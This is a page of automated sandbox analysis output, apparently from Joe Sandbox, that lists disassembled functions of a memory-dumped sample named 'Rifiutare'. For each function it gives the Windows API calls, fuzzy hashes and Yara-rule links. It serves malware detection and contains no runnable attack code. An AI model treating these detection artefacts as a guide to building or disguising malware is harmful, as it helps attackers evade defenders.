Opcode ID: 7ce59cb54b2918c9c495ab01e6fbbfdc380308b2ddee2165d27bb341793fe036
Instruction ID: 8e7bc9a6bdd5d7848812fb27d31421e81fc900b372a62226898865a80a761c9f
Opcode Fuzzy Hash: 7ce59cb54b2918c9c495ab01e6fbbfdc380308b2ddee2165d27bb341793fe036
Instruction Fuzzy Hash: 1F01A2B2209A163EF63126786CC1F6BA70DDF427B8B340325F631911D1EE608D41A570

Function 00C922A1 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00C922C1
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C922D3
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C922E9
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C92304

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 00ca8a8bda5b49f5297994e71e7bbf18e7e2cb9c30ea3556733ebc5593096ee7
Instruction ID: c7e35352ec093c99bfa7681d51b45e3992b7e3085611ce3882738beccc6d093e
Opcode Fuzzy Hash: 00ca8a8bda5b49f5297994e71e7bbf18e7e2cb9c30ea3556733ebc5593096ee7
Instruction Fuzzy Hash: FD11F77A900228FFEF119BA5C985F9DFBB8FB08750F204091EA51B7290D6716F10EB94

Function 00CCA4FB Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00C323E1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C323F2

GetClientRect.USER32(?,?), ref: 00CCA539
GetCursorPos.USER32(?), ref: 00CCA543
ScreenToClient.USER32(?,?), ref: 00CCA54E
DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 00CCA582

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 56727a74187a2c6effb2ad1e0054cbbd145c57969004049e73e5fe0095b9841c
Instruction ID: 2656eced1b246351014d64830e6130bbcdbb37911baac74e635bd49f3499505c
Opcode Fuzzy Hash: 56727a74187a2c6effb2ad1e0054cbbd145c57969004049e73e5fe0095b9841c
Instruction Fuzzy Hash: BF115A71A0151EABDB10DF58D889EEE77B8FB04304F004559F912E3250D330EA81DBA2

Function 00C9E9AD Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C9E9D4
MessageBoxW.USER32(?,?,?,?), ref: 00C9EA07
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C9EA1D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C9EA24

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 57b370b7be9fed77c0e2daf9a9a422a7f7b46bc50bdc3bcac254ed61c5b598ba
Instruction ID: 446ec018d90d1f893624c2a52fa137ee89d583e204d0cd0bfa0c8f0115947d36
Opcode Fuzzy Hash: 57b370b7be9fed77c0e2daf9a9a422a7f7b46bc50bdc3bcac254ed61c5b598ba
Instruction Fuzzy Hash: 9311A5B6900359BFCB01DFA8DC08B9E7FA9EB45320F044269F825E7390D6748E0497B1

Function 00C5D5EC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00C5D419,00000000,00000004,00000000), ref: 00C5D638
GetLastError.KERNEL32 ref: 00C5D644
__dosmaperr.LIBCMT ref: 00C5D64B
ResumeThread.KERNEL32(00000000), ref: 00C5D669

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 31d1474af574dadc5d39465c019466374650cb1fae2342e839131c20e22154cd
Instruction ID: 5c150ab7b98c2ab1795e1e3405167f0c978ee76ce6fb00c5c66c6d2fa628fefe
Opcode Fuzzy Hash: 31d1474af574dadc5d39465c019466374650cb1fae2342e839131c20e22154cd
Instruction Fuzzy Hash: 3B012B764003047BDB301BA5CC05F5E7B28DF81332F100214FD2A820D0DF708985D754

Function 00C36DB1 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C36DEF
GetStockObject.GDI32(00000011), ref: 00C36E03
SendMessageW.USER32(00000000,00000030,00000000), ref: 00C36E0D

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 65de9fef235038301b61e4b5aee96ee4bd2323abb600dd6d3b684d741f16cc18
Instruction ID: 95cb6b4bc9e7a16e233c3769283f6e13ba2a63c3791947f6d4e44bae838c455c
Opcode Fuzzy Hash: 65de9fef235038301b61e4b5aee96ee4bd2323abb600dd6d3b684d741f16cc18
Instruction Fuzzy Hash: 30116972111648BFEF125F90DC54FEABBA9FF083A4F044115FA1592160C731DD64ABE0

Function 00C63493 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00C310E8,00000000,00000000,?,00C6343A,00C310E8,00000000,00000000,00000000,?,00C636AB,00000006,FlsSetValue), ref: 00C634C5
GetLastError.KERNEL32(?,00C6343A,00C310E8,00000000,00000000,00000000,?,00C636AB,00000006,FlsSetValue,00CD3248,FlsSetValue,00000000,00000364,?,00C63266), ref: 00C634D1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C6343A,00C310E8,00000000,00000000,00000000,?,00C636AB,00000006,FlsSetValue,00CD3248,FlsSetValue,00000000), ref: 00C634DF

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 40dd01dccd4e0dcd953cfe13aaae7f4632d86b70a59d2c2cd465841632b15b8f
Instruction ID: 50eaffe6b11575e7b3fc1e0fcb9c856701fde897afd19e2a999d4c022831b02f
Opcode Fuzzy Hash: 40dd01dccd4e0dcd953cfe13aaae7f4632d86b70a59d2c2cd465841632b15b8f
Instruction Fuzzy Hash: E401AC36611262ABC7324B79DC84F6ABF58AF45B617150624F917D7180DB25DE0186E0

Function 00C9B8CC Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C9B4F7,?,00008000), ref: 00C9B8E8
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C9B4F7,?,00008000), ref: 00C9B90D
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C9B4F7,?,00008000), ref: 00C9B917
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C9B4F7,?,00008000), ref: 00C9B94A

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 39cd8ae9876df2b54d7f980a2cc70abf18520f8ecceeb0afeb90cc82c61693a9
Instruction ID: 57d4f18e385e0bf06a97b958baadfeca53befd70b8580e17b20ceae97b10b645
Opcode Fuzzy Hash: 39cd8ae9876df2b54d7f980a2cc70abf18520f8ecceeb0afeb90cc82c61693a9
Instruction Fuzzy Hash: 8C110C71D1052DEBCF009FE9EA4DBEDBB78BF09721F124095DA41B2250CB709A50CB55

Function 00CC841C Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00CC843B
ScreenToClient.USER32(?,?), ref: 00CC8453
ScreenToClient.USER32(?,?), ref: 00CC8477
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CC8492

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 7ab2424b9987ef96e8c08bcfbad9cf23d7729c595352e3bb223118d34d165ae8
Instruction ID: 5d79dcdd732cc42d4b3d1d0a73c17d1e346ec665bc33e28a09814383f810d8f1
Opcode Fuzzy Hash: 7ab2424b9987ef96e8c08bcfbad9cf23d7729c595352e3bb223118d34d165ae8
Instruction Fuzzy Hash: 7B1112B9D0020AEFDB51DFA8D884AEEBBF9FB08310F108566E915E3210D735AA55CF50

Function 00C935B2 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C935D0
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C935E1
GetCurrentThreadId.KERNEL32 ref: 00C935E8
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C935EF

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 150cf58f52aaafdb45bf8e759ecaa869a32102567da888c2d99fa4407756878d
Instruction ID: 5fcc8b77489658bb4ed486681b687f51d300d9c2978fe5c10a2483d3ab1e90ca
Opcode Fuzzy Hash: 150cf58f52aaafdb45bf8e759ecaa869a32102567da888c2d99fa4407756878d
Instruction Fuzzy Hash: 61E06D71201224BBDA201B62DC0EFEF7F6CDB46BA1F010025F106D20809AA0CA41C2B0

Function 00CC8E6B Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00C31E82: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C31EDC
Part of subcall function 00C31E82: SelectObject.GDI32(?,00000000), ref: 00C31EEB
Part of subcall function 00C31E82: BeginPath.GDI32(?), ref: 00C31F02
Part of subcall function 00C31E82: SelectObject.GDI32(?,00000000), ref: 00C31F2B

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00CC8E8F
LineTo.GDI32(?,?,?), ref: 00CC8E9C
EndPath.GDI32(?), ref: 00CC8EAC
StrokePath.GDI32(?), ref: 00CC8EBA

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: de51bd485398dae4eead153a595e20e7af2bdb6c94cfd5bfea5a3d8f39ed5476
Instruction ID: 141d813205c147926a6333308e662b1ab1b19591a59427163886470561eaed1a
Opcode Fuzzy Hash: de51bd485398dae4eead153a595e20e7af2bdb6c94cfd5bfea5a3d8f39ed5476
Instruction Fuzzy Hash: D8F05E3204265ABADB126F58EC0DFDF3F59AF06710F088105FA12611E1C7B55611DFA9

Function 00C320F0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00C3210C
SetTextColor.GDI32(?,?), ref: 00C32116
SetBkMode.GDI32(?,00000001), ref: 00C32129
GetStockObject.GDI32(00000005), ref: 00C32131

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 95f142900ee0307e8820567ded3920102042317a196c4c9334b0fe702b7ab96b
Instruction ID: 712d96d712ab89fbff17cf0d5cfc162dbfad912c725e76b053b054b79737b4ec
Opcode Fuzzy Hash: 95f142900ee0307e8820567ded3920102042317a196c4c9334b0fe702b7ab96b
Instruction Fuzzy Hash: 75E0ED32240680AEDB215B74EC09FED7B61AB12336F18C229F6BB980E1C7724645AB11

Function 00C8EA29 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00C8EA29
GetDC.USER32(00000000), ref: 00C8EA33
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C8EA53
ReleaseDC.USER32(?), ref: 00C8EA74

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 46dfbfc4da0ab02830c4dff2b99b2f572b7c845612f47fa20fa8c75882b04ba2
Instruction ID: 96edf07721109caf23e35b48573af1f0e542df27fa00340944ee9613b7e18fc4
Opcode Fuzzy Hash: 46dfbfc4da0ab02830c4dff2b99b2f572b7c845612f47fa20fa8c75882b04ba2
Instruction Fuzzy Hash: 74E012B5800200EFCB10AFA0D808BADBBB5FB08315F158869F84BE3210CB385A01EF10

Function 00C8EA3D Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00C8EA3D
GetDC.USER32(00000000), ref: 00C8EA47
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C8EA53
ReleaseDC.USER32(?), ref: 00C8EA74

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 3889ae0249ad481e99e97c544e49f5f894c30f97677ed7b350de4a241795271c
Instruction ID: 81f3bcda36920488438c24c4cc94d834d37e05521b82de4f14aa4c1d931e7243
Opcode Fuzzy Hash: 3889ae0249ad481e99e97c544e49f5f894c30f97677ed7b350de4a241795271c
Instruction Fuzzy Hash: 6EE092B5800204EFCB51AFB4D848B6DBBB5FB48315F158969F94BE3250CB785A01EF10

Function 00CA569E Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00C37A0C: _wcslen.LIBCMT ref: 00C37A11

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00CA57EB

Strings

LPT, xrefs: 00CA5712
*, xrefs: 00CA5727

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 68035735b9fb2cbef9b431c0a162a5f32cc5de15eff1aea4228b39a775165f5b
Instruction ID: e0cea90fd7f6ea89e937ec6a729c83d798e24b1f597184d54408c21546a14520
Opcode Fuzzy Hash: 68035735b9fb2cbef9b431c0a162a5f32cc5de15eff1aea4228b39a775165f5b
Instruction Fuzzy Hash: 74918E75A00605DFCB14CF54C484EAABBF1AF45318F19C099E85AAF3A2D735EE85CB90

Function 00C5E69D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00C5E72D

Strings

pow, xrefs: 00C5E705, 00C5E722

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 4466499ae5182e97c3e32cee4bf378168ad39dd844474e1f51b8171c165e6194
Instruction ID: 4a04c1adc80b621899e85e9aa8f7fe8e20589dc59a6beaeff3d7c97e5b026672
Opcode Fuzzy Hash: 4466499ae5182e97c3e32cee4bf378168ad39dd844474e1f51b8171c165e6194
Instruction Fuzzy Hash: E351D07590920186DB297718CD8137E2BA0EB44742F344E59F8F1462E9EF348FCD9A4E

Function 00C4B040 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

#, xrefs: 00C4B06A

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: ecdf85f67afca2a015181fb4f462379bdd91f43d06f00908ee3b6331f1284ca4
Instruction ID: 781e131e31f97342067c0d6329f0e4874d63f872fb27543612a5f4fa8b250743
Opcode Fuzzy Hash: ecdf85f67afca2a015181fb4f462379bdd91f43d06f00908ee3b6331f1284ca4
Instruction Fuzzy Hash: 8B510075504246DFDB25EF28C4906AEBBB0FF15314FA4405AF8A29B6D0EB30DE46CB64

Function 00C4F5B9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00C4F5CA
GlobalMemoryStatusEx.KERNEL32(?), ref: 00C4F5E3

Strings

@, xrefs: 00C4F5D7

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 28ee46c4dc193a4c8cb00c7595d64a47ec58b0e8f20993e44bc08300e68bf426
Instruction ID: 54bbb466aecc313688a0d6b670194ffc4189db14f190da8d7fb6ff8caa0ef71d
Opcode Fuzzy Hash: 28ee46c4dc193a4c8cb00c7595d64a47ec58b0e8f20993e44bc08300e68bf426
Instruction Fuzzy Hash: 4B514771418784ABD320AF10DC86BAFBBECFF85340F41885DF6D9411A1DB709969CB66

Function 00CC4C13 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00CC4CFB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CC4D10

Strings

', xrefs: 00CC4C6A

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

